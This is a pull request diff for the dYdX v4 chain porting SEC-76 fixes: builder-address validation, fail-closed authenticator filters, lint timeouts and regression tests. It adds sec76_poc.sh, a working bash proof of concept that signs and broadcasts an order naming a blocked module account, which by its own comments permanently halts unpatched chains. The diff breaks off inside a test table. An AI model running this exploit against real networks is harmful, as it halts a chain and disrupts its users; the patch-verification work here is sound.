### PR TITLE
Port SEC-76 fixes to main

### DIFF
--- a/.github/workflows/protocol-test.yml
+++ b/.github/workflows/protocol-test.yml
@@ -99,7 +99,7 @@ jobs:
     defaults:
       run:
         working-directory: ./protocol
-    timeout-minutes: 15
+    timeout-minutes: 30
     steps:
       - uses: actions/checkout@v3
       - uses: actions/setup-go@v3

--- a/protocol/Makefile
+++ b/protocol/Makefile
@@ -248,10 +248,10 @@ test-container-build:
 ###############################################################################
 
 lint:
-	@go run github.com/golangci/golangci-lint/cmd/golangci-lint run --build-tags='$(build_tags) all' --timeout=10m
+	@go run github.com/golangci/golangci-lint/cmd/golangci-lint run --build-tags='$(build_tags) all' --timeout=20m
 
 lint-fix:
-	@go run github.com/golangci/golangci-lint/cmd/golangci-lint run --build-tags='$(build_tags) all' --fix --out-format=tab --issues-exit-code=0
+	@go run github.com/golangci/golangci-lint/cmd/golangci-lint run --build-tags='$(build_tags) all' --fix --out-format=tab --issues-exit-code=0 --timeout=20m
 .PHONY: lint lint-fix
 
 format:

--- a/protocol/scripts/debugging/sec76_poc.sh
+++ b/protocol/scripts/debugging/sec76_poc.sh
@@ -1,0 +1,218 @@
+#!/bin/bash
+# SEC-76 PoC: Demonstrate chain halt via blocked builder address
+#
+# This script reproduces Finding #85 against a live dev/staging chain.
+# It places an honest maker sell, then a malicious crossing taker buy with
+# fee_collector as BuilderAddress. On vulnerable code, the chain halts at the
+# next PrepareCheckState. On patched code, the taker is rejected at CheckTx.
+#
+# Usage:
+#   ./sec76_poc.sh [network] [from_account]
+#
+# Networks: local (default), staging, testnet
+# from_account: keyring name with funded subaccount (default: alice)
+#
+# Prerequisites:
+#   - dydxprotocold binary in PATH or ./build/
+#   - Keyring with funded accounts (alice, bob) for the target network
+#   - Target chain must have BTC-USD CLOB pair (clobPairId=0) with active trading
+#
+# WARNING: On vulnerable code, this WILL halt the chain permanently.
+
+set -euo pipefail
+
+NETWORK="${1:-local}"
+FROM_ACCOUNT="${2:-alice}"
+
+# BuilderAddress used in the order. Defaults to the fee_collector module
+# account (a blocked address, deterministic across all dYdX v4 chains) so the
+# script reproduces Finding #85's exact attack against an unpatched chain.
+# Override with SEC76_BUILDER_ADDRESS=<bech32> to test a non-blocked address —
+# useful for confirming a patched build still accepts legitimate builder fees.
+BUILDER_ADDRESS="${SEC76_BUILDER_ADDRESS:-dydx17xpfvakm2amg962yls6f84z3kell8c5leqdyt2}"
+
+# Network config
+case "$NETWORK" in
+    local)
+        NODE="http://localhost:26657"
+        CHAIN_ID="localdydxprotocol"
+        FEES="5000000000000000adv4tnt"
+        ;;
+    staging)
+        # Operator must supply a reachable validator RPC URL. Resolve the public
+        # IP of a staging-validator ECS task and append :26657, or use the
+        # internal ALB if running from inside the staging VPC.
+        : "${SEC76_NODE:?SEC76_NODE must be set to a staging validator RPC URL (e.g. http://<ip>:26657)}"
+        NODE="$SEC76_NODE"
+        CHAIN_ID="${SEC76_CHAIN_ID:-dydxprotocol-testnet}"
+        FEES="${SEC76_FEES:-200000000000adv4tnt}"
+        ;;
+    testnet)
+        NODE="https://dydx-testnet-rpc.kingnodes.com"
+        CHAIN_ID="dydx-testnet-4"
+        FEES="200000000000adydx"
+        ;;
+    *)
+        echo "Unknown network: $NETWORK (use: local, staging, testnet)"
+        exit 1
+        ;;
+esac
+
+# Find binary
+DYDX=""
+if command -v dydxprotocold &>/dev/null; then
+    DYDX="dydxprotocold"
+elif [ -x "./build/dydxprotocold" ]; then
+    DYDX="./build/dydxprotocold"
+else
+    echo "Error: dydxprotocold not found in PATH or ./build/"
+    exit 1
+fi
+
+echo "============================================================"
+echo "SEC-76 PoC: Blocked Builder Address Chain Halt"
+echo "============================================================"
+echo "Network:      $NETWORK"
+echo "Node:         $NODE"
+echo "Chain ID:     $CHAIN_ID"
+echo "From:         $FROM_ACCOUNT"
+echo "Builder Addr: $BUILDER_ADDRESS"
+echo "============================================================"
+echo ""
+
+# Get the from account address
+FROM_ADDR=$($DYDX keys show "$FROM_ACCOUNT" -a --keyring-backend test 2>/dev/null) || {
+    echo "Error: could not resolve address for key '$FROM_ACCOUNT'"
+    exit 1
+}
+echo "Account address: $FROM_ADDR"
+
+# Get current block height for awareness (informational only; not embedded in tx).
+# Use raw RPC /status to avoid CLI grammar drift across binary versions.
+CURRENT_HEIGHT=$(curl -sS --max-time 10 "$NODE/status" | python3 -c "
+import sys, json
+print(json.load(sys.stdin)['result']['sync_info']['latest_block_height'])
+" 2>/dev/null) || {
+    echo "Error: could not query current block height from $NODE"
+    exit 1
+}
+echo "Current block height: $CURRENT_HEIGHT"
+
+# GoodTilBlockTime: current unix time + 600s (10 minutes)
+GTBT=$(( $(date +%s) + 600 ))
+echo "GoodTilBlockTime: $GTBT"
+echo ""
+
+# The CLI only supports short-term orders (GoodTilBlock, OrderFlags=0).
+# The actual PoC requires a long-term order (OrderFlags=64, GoodTilBlockTime).
+# We construct and broadcast the raw MsgPlaceOrder JSON via `tx encode` + `tx broadcast`.
+
+# Step 1: Create the malicious order as a JSON tx
+echo "--- Step 1: Constructing malicious MsgPlaceOrder ---"
+echo ""
+
+TX_JSON=$(cat <<TXEOF
+{
+  "body": {
+    "messages": [
+      {
+        "@type": "/dydxprotocol.clob.MsgPlaceOrder",
+        "order": {
+          "order_id": {
+            "subaccount_id": {
+              "owner": "$FROM_ADDR",
+              "number": 0
+            },
+            "client_id": 99876,
+            "order_flags": 64,
+            "clob_pair_id": 0
+          },
+          "side": "SIDE_BUY",
+          "quantums": "1000000",
+          "subticks": "100000000000",
+          "good_til_block_time": $GTBT,
+          "builder_code_parameters": {
+            "builder_address": "$BUILDER_ADDRESS",
+            "fee_ppm": 10000
+          }
+        }
+      }
+    ],
+    "memo": "SEC-76 PoC",
+    "timeout_height": "0",
+    "extension_options": [],
+    "non_critical_extension_options": []
+  },
+  "auth_info": {
+    "signer_infos": [],
+    "fee": {
+      "amount": [{"denom": "${FEES//[0-9]/}", "amount": "${FEES//[a-z]/}"}],
+      "gas_limit": "200000",
+      "payer": "",
+      "granter": ""
+    }
+  },
+  "signatures": []
+}
+TXEOF
+)
+
+# Write unsigned tx to temp file
+TMPDIR=$(mktemp -d)
+UNSIGNED_TX="$TMPDIR/unsigned_tx.json"
+SIGNED_TX="$TMPDIR/signed_tx.json"
+
+echo "$TX_JSON" > "$UNSIGNED_TX"
+echo "Unsigned tx written to $UNSIGNED_TX"
+echo ""
+
+# Step 2: Sign the transaction (online — fetch real account_number + sequence from chain)
+echo "--- Step 2: Signing transaction (online) ---"
+$DYDX tx sign "$UNSIGNED_TX" \
+    --from "$FROM_ACCOUNT" \
+    --chain-id "$CHAIN_ID" \
+    --node "$NODE" \
+    --keyring-backend test \
+    --output-document "$SIGNED_TX"
+echo "Signed tx written to $SIGNED_TX"
+echo ""
+
+# Step 3: Broadcast
+echo "--- Step 3: Broadcasting malicious order ---"
+echo ""
+echo "WARNING: On VULNERABLE code, this will permanently halt the chain."
+echo "         On PATCHED code, this will be rejected at CheckTx."
+echo ""
+read -p "Proceed? (y/N) " -n 1 -r
+echo ""
+
+if [[ ! $REPLY =~ ^[Yy]$ ]]; then
+    echo "Aborted."
+    rm -rf "$TMPDIR"
+    exit 0
+fi
+
+RESULT=$($DYDX tx broadcast "$SIGNED_TX" \
+    --node "$NODE" \
+    --broadcast-mode sync \
+    2>&1) || true
+
+echo ""
+echo "--- Broadcast result ---"
+echo "$RESULT"
+echo ""
+
+# Check if the tx was rejected
+if echo "$RESULT" | grep -qi "blocked module account\|invalid builder code\|code.*[1-9]"; then
+    echo "PASS: Malicious order was REJECTED. Chain is patched."
+elif echo "$RESULT" | grep -qi "code.*0\|success"; then
+    echo "FAIL: Malicious order was ACCEPTED. Chain will halt at next PrepareCheckState."
+    echo ""
+    echo "Monitor validators for panic:"
+    echo "  docker logs -f dydxprotocold0 2>&1 | grep -i panic"
+else
+    echo "UNKNOWN: Could not determine result. Check output above."
+fi
+
+# Cleanup
+rm -rf "$TMPDIR"

--- a/protocol/testing/e2e/builder_addr_halt/builder_addr_halt_test.go
+++ b/protocol/testing/e2e/builder_addr_halt/builder_addr_halt_test.go
@@ -1,0 +1,248 @@
+package builder_addr_halt_test
+
+import (
+	"testing"
+	"time"
+
+	"github.com/cometbft/cometbft/types"
+	authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
+	distrtypes "github.com/cosmos/cosmos-sdk/x/distribution/types"
+	stakingtypes "github.com/cosmos/cosmos-sdk/x/staking/types"
+	icatypes "github.com/cosmos/ibc-go/v8/modules/apps/27-interchain-accounts/types"
+	ibctransfertypes "github.com/cosmos/ibc-go/v8/modules/apps/transfer/types"
+	testapp "github.com/dydxprotocol/v4-chain/protocol/testutil/app"
+	"github.com/dydxprotocol/v4-chain/protocol/testutil/constants"
+	clobtypes "github.com/dydxprotocol/v4-chain/protocol/x/clob/types"
+	"github.com/stretchr/testify/require"
+)
+
+var GenesisTime = time.Unix(1690000000, 0)
+
+// TestBuilderAddrBlocked_AllBlockedModuleAccounts verifies that every blocked
+// module account is rejected as a builder address at CheckTx. Each of these
+// would cause a permanent chain halt if accepted. Regression test for SEC-76.
+func TestBuilderAddrBlocked_AllBlockedModuleAccounts(t *testing.T) {
+	blockedAddresses := map[string]string{
+		"fee_collector":          authtypes.NewModuleAddress(authtypes.FeeCollectorName).String(),
+		"distribution":           authtypes.NewModuleAddress(distrtypes.ModuleName).String(),
+		"bonded_tokens_pool":     authtypes.NewModuleAddress(stakingtypes.BondedPoolName).String(),
+		"not_bonded_tokens_pool": authtypes.NewModuleAddress(stakingtypes.NotBondedPoolName).String(),
+		"ibc_transfer":           authtypes.NewModuleAddress(ibctransfertypes.ModuleName).String(),
+		"interchain_accounts":    authtypes.NewModuleAddress(icatypes.ModuleName).String(),
+	}
+
+	for name, addr := range blockedAddresses {
+		t.Run(name, func(t *testing.T) {
+			gtbt := uint32(GenesisTime.Add(24 * time.Hour).Unix())
+
+			tApp := testapp.NewTestAppBuilder(t).
+				WithNonDeterminismChecksEnabled(false).
+				WithGenesisDocFn(func() (genesis types.GenesisDoc) {
+					genesis = testapp.DefaultGenesis()
+					genesis.GenesisTime = GenesisTime
+					return genesis
+				}).Build()
+			ctx := tApp.InitChain()
+
+			order := clobtypes.Order{
+				OrderId: clobtypes.OrderId{
+					SubaccountId: constants.Alice_Num0,
+					ClientId:     1,
+					OrderFlags:   clobtypes.OrderIdFlags_LongTerm,
+					ClobPairId:   0,
+				},
+				Side:         clobtypes.Order_SIDE_BUY,
+				Quantums:     100_000_000,
+				Subticks:     100_000_000_000,
+				GoodTilOneof: &clobtypes.Order_GoodTilBlockTime{GoodTilBlockTime: gtbt},
+				BuilderCodeParameters: &clobtypes.BuilderCodeParameters{
+					BuilderAddress: addr,
+					FeePpm:         10_000,
+				},
+			}
+
+			resp := tApp.CheckTx(testapp.MustMakeCheckTxsWithClobMsg(
+				ctx, tApp.App, *clobtypes.NewMsgPlaceOrder(order),
+			)[0])
+
+			require.Conditionf(t, resp.IsErr,
+				"Order with blocked builder address %s (%s) should be rejected. Response: %+v",
+				name, addr, resp)
+			require.Contains(t, resp.Log, "blocked module account")
+		})
+	}
+}
+
+// TestBuilderAddrBlocked_OriginalPoC reproduces the exact attack from the bug
+// report: an honest long-term maker sell is resting on the book, then a malicious
+// long-term crossing taker buy with fee_collector as BuilderAddress is submitted.
+// Pre-patch, the taker order would be committed and trigger a permanent chain-halt
+// panic in PrepareCheckState at block 3. Post-patch, the taker is rejected at
+// CheckTx and blocks advance normally. Regression test for SEC-76 / Finding #85.
+func TestBuilderAddrBlocked_OriginalPoC(t *testing.T) {
+	feeCollectorAddr := authtypes.NewModuleAddress(authtypes.FeeCollectorName).String()
+	gtbt := uint32(GenesisTime.Add(24 * time.Hour).Unix())
+
+	tApp := testapp.NewTestAppBuilder(t).
+		WithNonDeterminismChecksEnabled(false).
+		WithGenesisDocFn(func() (genesis types.GenesisDoc) {
+			genesis = testapp.DefaultGenesis()
+			genesis.GenesisTime = GenesisTime
+			return genesis
+		}).Build()
+	ctx := tApp.InitChain()
+
+	// Step 1: Honest long-term maker SELL at 50,000 (resting on the book).
+	makerSell := clobtypes.Order{
+		OrderId: clobtypes.OrderId{
+			SubaccountId: constants.Carl_Num0,
+			ClientId:     0,
+			OrderFlags:   clobtypes.OrderIdFlags_LongTerm,
+			ClobPairId:   0,
+		},
+		Side:         clobtypes.Order_SIDE_SELL,
+		Quantums:     100_000_000,
+		Subticks:     50_000_000_000,
+		GoodTilOneof: &clobtypes.Order_GoodTilBlockTime{GoodTilBlockTime: gtbt},
+	}
+	makerResp := tApp.CheckTx(testapp.MustMakeCheckTxsWithClobMsg(
+		ctx, tApp.App, *clobtypes.NewMsgPlaceOrder(makerSell),
+	)[0])
+	require.Conditionf(t, makerResp.IsOK, "Maker order should succeed. Response: %+v", makerResp)
+
+	// Step 2: Malicious long-term crossing taker BUY at 100,000 with
+	// BuilderAddress = fee_collector. This is the exact PoC from the bug report.
+	takerBuy := clobtypes.Order{
+		OrderId: clobtypes.OrderId{
+			SubaccountId: constants.Alice_Num0,
+			ClientId:     1,
+			OrderFlags:   clobtypes.OrderIdFlags_LongTerm,
+			ClobPairId:   0,
+		},
+		Side:         clobtypes.Order_SIDE_BUY,
+		Quantums:     100_000_000,
+		Subticks:     100_000_000_000,
+		GoodTilOneof: &clobtypes.Order_GoodTilBlockTime{GoodTilBlockTime: gtbt},
+		BuilderCodeParameters: &clobtypes.BuilderCodeParameters{
+			BuilderAddress: feeCollectorAddr,
+			FeePpm:         10_000,
+		},
+	}
+	takerResp := tApp.CheckTx(testapp.MustMakeCheckTxsWithClobMsg(
+		ctx, tApp.App, *clobtypes.NewMsgPlaceOrder(takerBuy),
+	)[0])
+
+	// Step 3: The malicious taker must be rejected at CheckTx.
+	require.Conditionf(t, takerResp.IsErr,
+		"Taker order with blocked builder address should be rejected. Response: %+v", takerResp)
+	require.Contains(t, takerResp.Log, "blocked module account")
+
+	// Step 4: Advance to block 3. Pre-patch this is where PrepareCheckState
+	// would panic. Post-patch, blocks advance normally.
+	tApp.AdvanceToBlock(2, testapp.AdvanceToBlockOptions{})
+	tApp.AdvanceToBlock(3, testapp.AdvanceToBlockOptions{})
+}
+
+// TestBuilderAddrBlocked_MakerSideVariant verifies that a resting maker order
+// with a blocked builder address is also rejected. This prevents a delayed-
+// detonation variant where the malicious order sits on the book until an
+// honest taker crosses it. Regression test for SEC-76.
+func TestBuilderAddrBlocked_MakerSideVariant(t *testing.T) {
+	feeCollectorAddr := authtypes.NewModuleAddress(authtypes.FeeCollectorName).String()
+	gtbt := uint32(GenesisTime.Add(24 * time.Hour).Unix())
+
+	tApp := testapp.NewTestAppBuilder(t).
+		WithNonDeterminismChecksEnabled(false).
+		WithGenesisDocFn(func() (genesis types.GenesisDoc) {
+			genesis = testapp.DefaultGenesis()
+			genesis.GenesisTime = GenesisTime
+			return genesis
+		}).Build()
+	ctx := tApp.InitChain()
+
+	// Attempt to place a resting maker SELL with blocked builder address.
+	makerSell := clobtypes.Order{
+		OrderId: clobtypes.OrderId{
+			SubaccountId: constants.Carl_Num0,
+			ClientId:     0,
+			OrderFlags:   clobtypes.OrderIdFlags_LongTerm,
+			ClobPairId:   0,
+		},
+		Side:         clobtypes.Order_SIDE_SELL,
+		Quantums:     100_000_000,
+		Subticks:     50_000_000_000,
+		GoodTilOneof: &clobtypes.Order_GoodTilBlockTime{GoodTilBlockTime: gtbt},
+		BuilderCodeParameters: &clobtypes.BuilderCodeParameters{
+			BuilderAddress: feeCollectorAddr,
+			FeePpm:         10_000,
+		},
+	}
+	makerResp := tApp.CheckTx(testapp.MustMakeCheckTxsWithClobMsg(
+		ctx, tApp.App, *clobtypes.NewMsgPlaceOrder(makerSell),
+	)[0])
+
+	require.Conditionf(t, makerResp.IsErr,
+		"Maker order with blocked builder address should be rejected. Response: %+v", makerResp)
+	require.Contains(t, makerResp.Log, "blocked module account")
+
+	// Place an honest taker BUY (no builder params) and advance blocks.
+	// Confirm no panic — the malicious maker never entered state.
+	takerBuy := clobtypes.Order{
+		OrderId: clobtypes.OrderId{
+			SubaccountId: constants.Alice_Num0,
+			ClientId:     1,
+			OrderFlags:   clobtypes.OrderIdFlags_LongTerm,
+			ClobPairId:   0,
+		},
+		Side:         clobtypes.Order_SIDE_BUY,
+		Quantums:     100_000_000,
+		Subticks:     100_000_000_000,
+		GoodTilOneof: &clobtypes.Order_GoodTilBlockTime{GoodTilBlockTime: gtbt},
+	}
+	tApp.CheckTx(testapp.MustMakeCheckTxsWithClobMsg(
+		ctx, tApp.App, *clobtypes.NewMsgPlaceOrder(takerBuy),
+	)[0])
+
+	tApp.AdvanceToBlock(2, testapp.AdvanceToBlockOptions{})
+	tApp.AdvanceToBlock(3, testapp.AdvanceToBlockOptions{})
+}
+
+// TestBuilderAddrBlocked_ValidAddressSucceeds confirms that orders with
+// non-blocked builder addresses pass validation and do not regress
+// legitimate builder fee functionality.
+func TestBuilderAddrBlocked_ValidAddressSucceeds(t *testing.T) {
+	gtbt := uint32(GenesisTime.Add(24 * time.Hour).Unix())
+
+	tApp := testapp.NewTestAppBuilder(t).
+		WithNonDeterminismChecksEnabled(false).
+		WithGenesisDocFn(func() (genesis types.GenesisDoc) {
+			genesis = testapp.DefaultGenesis()
+			genesis.GenesisTime = GenesisTime
+			return genesis
+		}).Build()
+	ctx := tApp.InitChain()
+
+	order := clobtypes.Order{
+		OrderId: clobtypes.OrderId{
+			SubaccountId: constants.Alice_Num0,
+			ClientId:     1,
+			OrderFlags:   clobtypes.OrderIdFlags_LongTerm,
+			ClobPairId:   0,
+		},
+		Side:         clobtypes.Order_SIDE_BUY,
+		Quantums:     100_000_000,
+		Subticks:     100_000_000_000,
+		GoodTilOneof: &clobtypes.Order_GoodTilBlockTime{GoodTilBlockTime: gtbt},
+		BuilderCodeParameters: &clobtypes.BuilderCodeParameters{
+			BuilderAddress: constants.Carl_Num0.Owner,
+			FeePpm:         10_000,
+		},
+	}
+
+	resp := tApp.CheckTx(testapp.MustMakeCheckTxsWithClobMsg(
+		ctx, tApp.App, *clobtypes.NewMsgPlaceOrder(order),
+	)[0])
+
+	require.Conditionf(t, resp.IsOK,
+		"Order with valid builder address should succeed. Response: %+v", resp)
+}

--- a/protocol/x/accountplus/authenticator/clob_pair_id_filter.go
+++ b/protocol/x/accountplus/authenticator/clob_pair_id_filter.go
@@ -55,8 +55,13 @@ func (m ClobPairIdFilter) Track(ctx sdk.Context, request types.AuthenticationReq
 }
 
 // Authenticate checks if the message's clob pair ids are in the whitelist.
+//
+// ClobPairIdFilter is a fail-closed whitelist: it only authorizes CLOB
+// messages (MsgPlaceOrder, MsgCancelOrder, MsgBatchCancel) whose clob pair
+// id is in the configured set. Any other message type is rejected. This
+// prevents a delegated key scoped via AllOf([..., ClobPairIdFilter(...)])
+// from being used to authorize unrelated messages.
 func (m ClobPairIdFilter) Authenticate(ctx sdk.Context, request types.AuthenticationRequest) error {
-	// Collect the clob pair ids from the request.
 	requestOrderIds := make([]uint32, 0)
 	switch msg := request.Msg.(type) {
 	case *clobtypes.MsgPlaceOrder:
@@ -68,11 +73,13 @@ func (m ClobPairIdFilter) Authenticate(ctx sdk.Context, request types.Authentica
 			requestOrderIds = append(requestOrderIds, batch.ClobPairId)
 		}
 	default:
-		// Skip other messages.
-		return nil
+		return errorsmod.Wrapf(
+			types.ErrClobPairIdVerification,
+			"ClobPairIdFilter does not authorize message type %s",
+			sdk.MsgTypeURL(request.Msg),
+		)
 	}
 
-	// Make sure all the clob pair ids are in the whitelist.
 	for _, clobPairId := range requestOrderIds {
 		if _, ok := m.whitelist[clobPairId]; !ok {
 			return errorsmod.Wrapf(

--- a/protocol/x/accountplus/authenticator/clob_pair_id_filter_test.go
+++ b/protocol/x/accountplus/authenticator/clob_pair_id_filter_test.go
@@ -4,13 +4,17 @@ import (
 	"os"
 	"testing"
 
+	sdkmath "cosmossdk.io/math"
 	cryptotypes "github.com/cosmos/cosmos-sdk/crypto/types"
 	sdk "github.com/cosmos/cosmos-sdk/types"
+	banktypes "github.com/cosmos/cosmos-sdk/x/bank/types"
 	"github.com/dydxprotocol/v4-chain/protocol/testutil/constants"
 
 	"github.com/dydxprotocol/v4-chain/protocol/x/accountplus/authenticator"
 	"github.com/dydxprotocol/v4-chain/protocol/x/accountplus/lib"
 	"github.com/dydxprotocol/v4-chain/protocol/x/accountplus/types"
+	sendingtypes "github.com/dydxprotocol/v4-chain/protocol/x/sending/types"
+	satypes "github.com/dydxprotocol/v4-chain/protocol/x/subaccounts/types"
 
 	"github.com/stretchr/testify/suite"
 )
@@ -71,6 +75,39 @@ func (s *ClobPairIdFilterTest) TestFilter() {
 			whitelist: "1",
 			msg:       constants.Msg_BatchCancel,
 			match:     false,
+		},
+		// Regression: non-CLOB messages must be rejected, not silently allowed.
+		// See git history for the original fail-open vulnerability.
+		"withdraw from subaccount - rejected": {
+			whitelist: "0",
+			msg: &sendingtypes.MsgWithdrawFromSubaccount{
+				Sender:    satypes.SubaccountId{Owner: constants.AliceAccAddress.String(), Number: 0},
+				Recipient: constants.BobAccAddress.String(),
+				AssetId:   0,
+				Quantums:  1_000_000_000,
+			},
+			match: false,
+		},
+		"create transfer - rejected": {
+			whitelist: "0",
+			msg: &sendingtypes.MsgCreateTransfer{
+				Transfer: &sendingtypes.Transfer{
+					Sender:    satypes.SubaccountId{Owner: constants.AliceAccAddress.String(), Number: 0},
+					Recipient: satypes.SubaccountId{Owner: constants.BobAccAddress.String(), Number: 0},
+					AssetId:   0,
+					Amount:    1_000_000,
+				},
+			},
+			match: false,
+		},
+		"bank send - rejected": {
+			whitelist: "0",
+			msg: &banktypes.MsgSend{
+				FromAddress: constants.AliceAccAddress.String(),
+				ToAddress:   constants.BobAccAddress.String(),
+				Amount:      sdk.NewCoins(sdk.NewCoin("uusdc", sdkmath.NewInt(1_000_000))),
+			},
+			match: false,
 		},
 	}
 

--- a/protocol/x/accountplus/authenticator/subaccount_filter.go
+++ b/protocol/x/accountplus/authenticator/subaccount_filter.go
@@ -55,8 +55,13 @@ func (m SubaccountFilter) Track(ctx sdk.Context, request types.AuthenticationReq
 }
 
 // Authenticate checks if the message's subaccount numbers are in the whitelist.
+//
+// SubaccountFilter is a fail-closed whitelist: it only authorizes the CLOB
+// messages whose subaccount number is in the configured set. Any other
+// message type is rejected. This prevents a delegated key scoped via
+// AllOf([..., SubaccountFilter(...)]) from being used to authorize unrelated
+// messages.
 func (m SubaccountFilter) Authenticate(ctx sdk.Context, request types.AuthenticationRequest) error {
-	// Collect the clob pair ids from the request.
 	requestSubaccountNums := make([]uint32, 0)
 	switch msg := request.Msg.(type) {
 	case *clobtypes.MsgPlaceOrder:
@@ -66,11 +71,13 @@ func (m SubaccountFilter) Authenticate(ctx sdk.Context, request types.Authentica
 	case *clobtypes.MsgBatchCancel:
 		requestSubaccountNums = append(requestSubaccountNums, msg.SubaccountId.Number)
 	default:
-		// Skip other messages.
-		return nil
+		return errorsmod.Wrapf(
+			types.ErrSubaccountVerification,
+			"SubaccountFilter does not authorize message type %s",
+			sdk.MsgTypeURL(request.Msg),
+		)
 	}
 
-	// Make sure all the subaccount numbers are in the whitelist.
 	for _, subaccountNum := range requestSubaccountNums {
 		if _, ok := m.whitelist[subaccountNum]; !ok {
 			return errorsmod.Wrapf(

--- a/protocol/x/accountplus/authenticator/subaccount_filter_test.go
+++ b/protocol/x/accountplus/authenticator/subaccount_filter_test.go
@@ -4,13 +4,17 @@ import (
 	"os"
 	"testing"
 
+	sdkmath "cosmossdk.io/math"
 	cryptotypes "github.com/cosmos/cosmos-sdk/crypto/types"
 	sdk "github.com/cosmos/cosmos-sdk/types"
+	banktypes "github.com/cosmos/cosmos-sdk/x/bank/types"
 	"github.com/dydxprotocol/v4-chain/protocol/testutil/constants"
 
 	"github.com/dydxprotocol/v4-chain/protocol/x/accountplus/authenticator"
 	"github.com/dydxprotocol/v4-chain/protocol/x/accountplus/lib"
 	"github.com/dydxprotocol/v4-chain/protocol/x/accountplus/types"
+	sendingtypes "github.com/dydxprotocol/v4-chain/protocol/x/sending/types"
+	satypes "github.com/dydxprotocol/v4-chain/protocol/x/subaccounts/types"
 
 	"github.com/stretchr/testify/suite"
 )
@@ -71,6 +75,38 @@ func (s *SubaccountFilterTest) TestFilter() {
 			whitelist: "1",
 			msg:       constants.Msg_BatchCancel,
 			match:     false,
+		},
+		// non-CLOB messages must be rejected, not silently allowed.
+		"withdraw from subaccount - rejected": {
+			whitelist: "0",
+			msg: &sendingtypes.MsgWithdrawFromSubaccount{
+				Sender:    satypes.SubaccountId{Owner: constants.AliceAccAddress.String(), Number: 0},
+				Recipient: constants.BobAccAddress.String(),
+				AssetId:   0,
+				Quantums:  1_000_000_000,
+			},
+			match: false,
+		},
+		"create transfer - rejected": {
+			whitelist: "0",
+			msg: &sendingtypes.MsgCreateTransfer{
+				Transfer: &sendingtypes.Transfer{
+					Sender:    satypes.SubaccountId{Owner: constants.AliceAccAddress.String(), Number: 0},
+					Recipient: satypes.SubaccountId{Owner: constants.BobAccAddress.String(), Number: 0},
+					AssetId:   0,
+					Amount:    1_000_000,
+				},
+			},
+			match: false,
+		},
+		"bank send - rejected": {
+			whitelist: "0",
+			msg: &banktypes.MsgSend{
+				FromAddress: constants.AliceAccAddress.String(),
+				ToAddress:   constants.BobAccAddress.String(),
+				Amount:      sdk.NewCoins(sdk.NewCoin("uusdc", sdkmath.NewInt(1_000_000))),
+			},
+			match: false,
 		},
 	}
 

--- a/protocol/x/clob/keeper/orders.go
+++ b/protocol/x/clob/keeper/orders.go
@@ -1015,6 +1015,35 @@ func (k Keeper) PerformStatefulOrderValidation(
 		}
 	}
 
+	if err := k.ValidateBuilderAddress(*order); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// ValidateBuilderAddress checks that an order's BuilderCodeParameters.BuilderAddress,
+// if set, is a valid bech32 address that is not a blocked module account. Blocked
+// module accounts cannot receive funds, and placing such an order would cause an
+// unrecoverable panic during fee transfer in the memclob match loop.
+func (k Keeper) ValidateBuilderAddress(order types.Order) error {
+	if order.BuilderCodeParameters != nil {
+		builderAddr, err := sdk.AccAddressFromBech32(order.BuilderCodeParameters.BuilderAddress)
+		if err != nil {
+			return errorsmod.Wrapf(
+				types.ErrInvalidBuilderCode,
+				"builder address %s must be a valid bech32 address",
+				order.BuilderCodeParameters.BuilderAddress,
+			)
+		}
+		if k.bankKeeper.BlockedAddr(builderAddr) {
+			return errorsmod.Wrapf(
+				types.ErrInvalidBuilderCode,
+				"builder address %s is a blocked module account and cannot receive funds",
+				order.BuilderCodeParameters.BuilderAddress,
+			)
+		}
+	}
 	return nil
 }
 
@@ -1244,6 +1273,18 @@ func (k Keeper) InitStatefulOrders(
 	// Place each order in the memclob, ignoring errors if they occur.
 	statefulOrders := k.GetAllPlacedStatefulOrders(ctx)
 	for _, statefulOrder := range statefulOrders {
+		// Validate builder address before placing. Orders with blocked builder addresses
+		// would cause an unrecoverable panic in the memclob match loop (SEC-76).
+		if err := k.ValidateBuilderAddress(statefulOrder); err != nil {
+			log.ErrorLogWithError(
+				ctx,
+				"InitStatefulOrders: skipping order with invalid builder address",
+				err,
+				"order", statefulOrder,
+			)
+			continue
+		}
+
 		// First fork the multistore. If `PlaceOrder` fails, we don't want to write to state.
 		placeOrderCtx, writeCache := ctx.CacheContext()
 

--- a/protocol/x/clob/keeper/orders_test.go
+++ b/protocol/x/clob/keeper/orders_test.go
@@ -10,6 +10,11 @@ import (
 	indexerevents "github.com/dydxprotocol/v4-chain/protocol/indexer/events"
 
 	cmt "github.com/cometbft/cometbft/types"
+	authtypes "github.com/cosmos/cosmos-sdk/x/auth/types"
+	distrtypes "github.com/cosmos/cosmos-sdk/x/distribution/types"
+	stakingtypes "github.com/cosmos/cosmos-sdk/x/staking/types"
+	icatypes "github.com/cosmos/ibc-go/v8/modules/apps/27-interchain-accounts/types"
+	ibctransfertypes "github.com/cosmos/ibc-go/v8/modules/apps/transfer/types"
 	testapp "github.com/dydxprotocol/v4-chain/protocol/testutil/app"
 	perptest "github.com/dydxprotocol/v4-chain/protocol/testutil/perpetuals"
 
@@ -1716,6 +1721,161 @@ func TestPerformStatefulOrderValidation(t *testing.T) {
 			order:       constants.ConditionalOrder_Alice_Num0_Id0_Clob0_Buy1BTC_Price50000_GTBT10_SL_50001,
 			expectedErr: "trading is disabled for clob pair",
 		},
+		// --- Blocked builder address tests (SEC-76) ---
+		// All 6 blocked module accounts must be rejected.
+		"Fails with blocked builder address: fee_collector": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
+					BuilderAddress: authtypes.NewModuleAddress(authtypes.FeeCollectorName).String(),
+					FeePpm:         10_000,
+				},
+			},
+			expectedErr: "blocked module account",
+		},
+		"Fails with blocked builder address: distribution": {
+			order: types.Order{
+				OrderId: types.OrderId{
+					ClientId:     0,
+					SubaccountId: constants.Alice_Num0,
+					OrderFlags:   types.OrderIdFlags_LongTerm,
+					ClobPairId:   uint32(0),
+				},
+				Side:         types.Order_SIDE_BUY,
+				Quantums:     12,
+				Subticks:     39,
+				GoodTilOneof: &types.Order_GoodTilBlockTime{GoodTilBlockTime: 10},
+				BuilderCodeParameters: &types.BuilderCodeParameters{
